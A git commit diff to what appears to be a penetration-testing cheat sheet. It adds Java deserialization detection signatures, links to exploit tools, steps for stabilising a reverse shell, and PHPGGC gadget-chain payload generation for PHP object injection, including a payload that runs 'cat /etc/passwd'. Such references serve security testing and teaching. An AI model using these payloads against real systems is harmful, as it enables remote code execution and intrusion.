PHP Serialization - phpggc

This commit is contained in:
Swissky 2018-10-01 12:30:14 +02:00
parent 6ca5ff1703
commit 7b49f1b13a
3 changed files with 39 additions and 4 deletions

View file

@ -1,5 +1,12 @@
# Java Deserialization
## Detection
- "AC ED 00 05" in Hex
- "rO0" in Base64
- Content-type = "application/x-java-serialized-object"
- "H4sIAAAAAAAAAJ" in gzip(base64)
## Exploit
[ysoserial](https://github.com/frohoff/ysoserial) : A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization.
@ -54,8 +61,12 @@ Additional tools (integration ysoserial with Burp Suite):
JRE8u20_RCE_Gadget
[https://github.com/pwntester/JRE8u20_RCE_Gadget](https://github.com/pwntester/JRE8u20_RCE_Gadget)
JexBoss - JBoss (and others Java Deserialization Vulnerabilities) verify and EXploitation Tool, [https://github.com/joaomatosf/jexboss](https://github.com/joaomatosf/jexboss)
## Thanks to
- [Github - ysoserial](https://github.com/frohoff/ysoserial)
- [Java-Deserialization-Cheat-Sheet - GrrrDog](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet/blob/master/README.md)
- [Understanding & practicing java deserialization exploits](https://diablohorn.com/2017/09/09/understanding-practicing-java-deserialization-exploits/)
- [How i found a 1500$ worth Deserialization vulnerability - @D0rkerDevil](https://medium.com/@D0rkerDevil/how-i-found-a-1500-worth-deserialization-vulnerability-9ce753416e0a)
- [Misconfigured JSF ViewStates can lead to severe RCE vulnerabilities - 14 Aug 2017, Peter Stöckli](https://www.alphabot.com/security/blog/2017/java/Misconfigured-JSF-ViewStates-can-lead-to-severe-RCE-vulnerabilities.html)

View file

@ -151,12 +151,19 @@ lua: os.execute('/bin/sh')
```
Access shortcuts, su, nano and autocomplete in a partially tty shell
/!\ OhMyZSH might break this trick
/!\ OhMyZSH might break this trick, a simple `sh` is recommended
```powershell
# in host
ctrl+z
stty raw -echo
fg
# in reverse shell
reset
export SHELL=bash
export TERM=xterm-256color
stty rows <num> columns <cols>
```
(From within vi)

View file

@ -130,8 +130,25 @@ echo urlencode(serialize(new PHPObjectInjection));
//'O:18:"PHPObjectInjection":1:{s:6:"inject";s:26:"system(\'cat+/etc/passwd\');";}'
```
## Finding and using gadgets
[PHPGGC](https://github.com/ambionics/phpggc) is a tool built to generate the payload based on several frameworks:
- Laravel
- Symfony
- SwiftMailer
- Monolog
- SlimPHP
- Doctrine
- Guzzle
```powershell
phpggc monolog/rce1 'phpinfo();' -s
```
## Thanks to
* [PHP Object Injection - OWASP](https://www.owasp.org/index.php/PHP_Object_Injection)
* [PHP Object Injection - Thin Ba Shane](http://location-href.com/php-object-injection/)
* [PHP unserialize](http://php.net/manual/en/function.unserialize.php)
- [PHP Object Injection - OWASP](https://www.owasp.org/index.php/PHP_Object_Injection)
- [PHP Object Injection - Thin Ba Shane](http://location-href.com/php-object-injection/)
- [PHP unserialize](http://php.net/manual/en/function.unserialize.php)
- [PHP Generic Gadget - ambionics security](https://www.ambionics.io/blog/php-generic-gadget-chains)